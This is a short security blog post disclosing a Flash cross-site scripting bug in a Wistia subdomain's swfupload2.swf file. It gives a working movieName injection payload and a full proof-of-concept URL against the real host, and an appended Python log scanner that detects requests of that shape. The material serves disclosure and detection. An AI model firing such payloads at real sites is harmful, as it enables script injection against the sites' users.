Flash Cross Site Scripting (XSS)

Hello friend, today I am sharing my POC on a Flash XSS which I found in a Wistia.com sub-domain. I was just going through sites and found this one and just started testing it, and in the first shot reported 2 HTML injections, and I was like :D hahaha. So I started testing for some other bugs too. After that I thought that this is a video hosting site and it may have a SWF file, so I started digging into it and found a vulnerable SWF file in their Premium team Login site :D

Here is the POC and the exploit, which is already published :-

Exploit :-

http://1337day.com/exploit/20669

Vulnerable URL :-


Vulnerable File :-

swfupload2.swf

Vulnerable Parameter :-

?movieName=

Payload Used :-

"]);}catch(e){}if(!self.a)self.a=!alert('XSS-Osama-Mahmood');//


POC Url :-

https://fast.wistia.com/flash/swfupload2.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS-Osama-Mahmood');//

But sadly I forgot to take the screenshot :\ so this is it.

Thanks
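
For defenders reviewing web server logs for requests of this shape, the following added example (not part of the original post and not SWFUpload's own code) flags `.swf` requests whose `movieName` value contains anything other than identifier characters. The allowlist, the function names and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: legitimate movieName values are plain identifiers such as "SWFUpload_0".
SAFE_MOVIE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")
# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2000:10:00:00 +0000] '
    '"GET /flash/swfupload2.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12345',
    '203.0.113.9 - - [01/Jan/2000:10:00:05 +0000] '
    '"GET /flash/swfupload2.swf?movieName=%22%5D)%3B%7Dcatch(e)%7B%7Dalert(1)%2F%2F HTTP/1.1" 200 12345',
    '203.0.113.9 - - [01/Jan/2000:10:00:09 +0000] '
    '"GET /index.html?movieName=%22%5D HTTP/1.1" 200 512',
]


def check_target(target):
    """Return the decoded movieName if a .swf request carries a value
    outside the allowlist, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return None
    # parse_qsl percent-decodes each value, so encoded quotes and brackets are seen.
    for key, value in parse_qsl(parts.query):
        if key == "movieName" and not SAFE_MOVIE_NAME.fullmatch(value):
            return value
    return None


def scan_log(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        value = check_target(match.group(1))
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan_log(SAMPLE_LOG):
        print(f"line {number}: suspicious movieName {value!r}")
```

The same allowlist can be applied server-side or in a WAF rule in front of any page that still serves a SWF taking this parameter.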
Hi, this is Osama Mahmood and I will share all my knowledge and skills on #infosec with you, and I hope you will enjoy learning new and unique things. Follow me on Twitter @OsamaMahmood007